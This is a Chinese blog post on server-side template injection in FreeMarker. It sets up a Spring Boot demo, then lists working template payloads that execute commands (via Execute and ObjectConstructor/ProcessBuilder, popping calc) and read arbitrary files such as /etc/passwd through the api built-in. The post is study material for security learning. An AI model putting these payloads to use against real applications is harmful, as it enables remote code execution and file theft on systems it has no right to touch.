Freemarker代码

于 2023-08-29 00:55:47 发布
阅读量172 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: JAVA 文章标签: web安全 java 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/bring_coco/article/details/132551001

中文文档
http://freemarker.foofun.cn/ref_depr_numerical_interpolation.html

payload构造:
https://teamssix.com/211203-200441.html#toc-heading-4

正常使用方法:https://blog.youkuaiyun.com/zenyangqiming/article/details/108415063

写Freemarker项目

我们先来正向写Freemarker项目
application.properties

# 模板后缀名
spring.freemarker.suffix=.ftl
# 文档类型
spring.freemarker.content-type=text/html
# 页面编码
spring.freemarker.charset=UTF-8
# 页面缓存
spring.freemarker.cache=false
# 模板路径
spring.freemarker.template-loader-path=classpath:/templates/

server.port=8886

index.ftl

<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <title>FreeMarkerdemo</title>
</head>
<body>
<table>
    <tr>
        <td>网络ID</td>
        <td>公众号名称</td>
    </tr>
    <tr>
        <td>${user.id}</td>
        <td>${user.name}</td>
    </tr>
</table>
</body>
</html>

FreemarkerController

package com.example.freemarker;

import org.springframework.stereotype.Controller;
import org.springframework.ui.ModelMap;
import org.springframework.web.bind.annotation.RequestMapping;

import java.util.HashMap;
import java.util.Map;

@Controller
public class FreemarkerController {
    @RequestMapping("/freemarker/index")
    public String fmIndex(ModelMap modelMap){
        Map<String,String> map = new HashMap<>();
        map.put("id","666");
        map.put("name","qiezi");

        //给模板添加上面的属性值
        modelMap.addAttribute("user",map);
        return "index";
    }
}

运行项目,如下在这里插入图片描述

命令执行攻击

new函数利用

利用方法一(RCE)

<#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}

在这里插入图片描述
访问http://127.0.0.1:8886/freemarker/index路径时候,会命令执行弹出calc

利用方法二(RCE)


<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc").start()}

在这里插入图片描述

api函数利用

利用方法一(RCE)

<#assign classLoader=object?api.class.getClassLoader()>${classLoader.loadClass("Evil.class")}

在这里插入图片描述
可以看到没有成功
我们看看原因,如下:
在这里插入图片描述
在这里插入图片描述
查看版本发现是2.3.31版本,freemarker在在 2.3.22 版本之后apiBuiltinEnabled 默认为 false,apiBuiltinEnabled 为true时候才能生效

利用方法二(任意文件读取)

<#assign uri=object?api.class.getResource("/").toURI()> 
    <#assign input=uri?api.create("file:///etc/passwd").toURL().openConnection()> 
    <#assign is=input?api.getInputStream()> 
    FILE:[<#list 0..999999999 as _> 
        <#assign byte=is.read()> 
        <#if byte == -1> 
            <#break> 
         </#if> 
    ${byte}, </#list>]

在这里插入图片描述

freemarker代码
02-05
FreeMarker是一个用Java语言编写的模板引擎,它基于模板来生成文本输出。FreeMarkerWeb容器无关,即在Web运行时,它并不知道Servlet或HTTP。它不仅可以用作表现层的实现技术,而且还可以用于生成XML,JSP或Java
Freemarker源码解析
shuhuai007的专栏
10-21 3477
http://aixiangct.blog.163.com/blog/static/915224612011413113013687/   FreeMarker 自定义模版文件加载器        模版文件加载器用来告诉 FreeMarker 引擎到什么地方去加载模版文件。 FreeMarker 自带了三种文件加载器,分别是:文件目录加载器、类路径加载器以及 Web 上下文加载器。当在 We
freemarker 源码、中文API、 freemarker Myeclipse 编辑器
01-21
包括freemarker源码、freemarker中文API、freemarker myeclipse编辑器及编辑器安装提示
freemarker 源码分析
feiyan35488的专栏
09-14 290
正在研究freemarker源码
使用freemarker模板生成简单的代码
madman
09-12 1144
main方法 package com.imobapy.base.util; import freemarker.template.Configuration; import freemarker.template.Template; import freemarker.template.TemplateException; import java.io.File; import java.io.FileOutputStream; import java.io.IOException; import java
基于spring boot freemarker代码生成器
01-26
代码生成器支持model、Mapper、Dao、Service、ServiceImpl、Controller 一次性的生成,支持同时生成多张表,此代码生成器依赖JAR包比较少,除了必用Freemarker 和JDBC之外基本上完全个人编写
freemarker代码
12-26
本自学代码资源将帮助你深入理解Freemarker的工作原理及其在实际项目中的应用。 一、Freemarker基本概念 1. 模板:Freemarker的核心是模板,模板是HTML或其他文本文件,其中包含Freemarker表达式和指令,这些元素会...
基于CodeMirror的FreeMarker代码高亮编辑器设计源码
最新发布
02-21
本项目“基于CodeMirror的FreeMarker代码高亮编辑器设计源码”是一个专门为JavaScript语言编写的代码编辑器插件,同时支持HTML和CSS的代码高亮显示。它利用CodeMirror强大的编辑器框架,结合FreeMarker的模板语法,...
Freemarker代码生成器实体映射xml的ftl模板文件
07-03
Freemarker代码生成器是一种强大的工具,用于自动生成符合特定需求的代码,它可以极大地提高开发效率,减少重复劳动。在Java开发中,特别是在企业级应用中,XML文件常常被用来作为配置文件,其中包含了对象与数据库...
springboot 整合 freemarker代码实例
08-25
在给出的代码实例中,可以看到Spring Boot的父依赖、Spring Boot的FreeMarker starter、Lombok、OkHttp3、Apache Commons IO以及Spring Boot的Web和测试相关依赖。这些依赖用于支持FreeMarker模板的解析、HTTP请求、...
Freemarker及源代码及教程
07-08
Freemaker是一个强大的模板引擎,相比velocity而言,其强大的过程调用、递归和闭包回调功能让freemaker可以完成几乎所有我们所想的功能。从个人看法而言,freemaker完全有能力作为MDA的代码辅助生成工具。 <br><br>
freemarker模板
08-13
NULL 博文链接:https://gaochunhu.iteye.com/blog/2299998
freemarker2.3源码以及build之后的(包含build所需jar包)
01-15
freemarker2.3源码以及build之后的(包含build所需jar包)
FreeMarker教你如何生成html静态页面源码
05-10
FreeMarker教你如何生成html静态页面源码
Freemarker源码分析(11)core.MarkupOutputFormat<MO>及其子类
Vakie的博客
12-19 310
2021SC@SDUSC 总览图 MarkupOutputFormat 代码: public abstract class MarkupOutputFormat<MO extends TemplateMarkupOutputModel> extends OutputFormat { protected MarkupOutputFormat() { // Only to decrease visibility } public abstract MO
FreeMarker源码分析(三)
weixin_45769314的博客
10-15 582
2021SC@SDUSC 目录 Log包 SLF4JLoggerFactory.java 源码展示 代码分析 关于slf4j Logger.java 源码展示 源码分析 Log包 本篇主要来分析LoggerFactory的余下代码和Logger代码 SLF4JLoggerFactory.java 源码展示 /* * Licensed to the Apache Software Foundation (ASF) under one * or more contribu
FreeMarker_模板引擎_代码自动生成器_源码下载
纸上得来终觉浅,绝知此事要躬行
02-13 1084
原文地址:http://www.cnblogs.com/hongten/archive/2013/04/05/hongten_freemarker.html 项目结构: 运行代码: 1 public static void main(String[] args) throws Exception { 2 helloWorld(FTLS_PATH, HONGTEN_HELL
FreeMarker源码分析(六)
weixin_45769314的博客
11-13 251
2021SC@SDUSC 目录 SimpleCollection.java 源码展示 关键代码分析 iterator() next() SimpleHash.java 源码展示 关键代码分析 SimpleHash() get() SimpleCollection.java 源码展示 package freemarker.template; import java.io.Serializable; import java.util.Collection; import java
FreeMarker代码自动生成实例教程
- **代码生成的具体实现**:在FreeMarkerTemplateDemo项目中,开发者需要具体演示如何利用FreeMarker来生成Java代码、配置文件或其他类型的代码。这涉及到对FreeMarker生成能力的理解和实践。 - **错误处理与调试...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值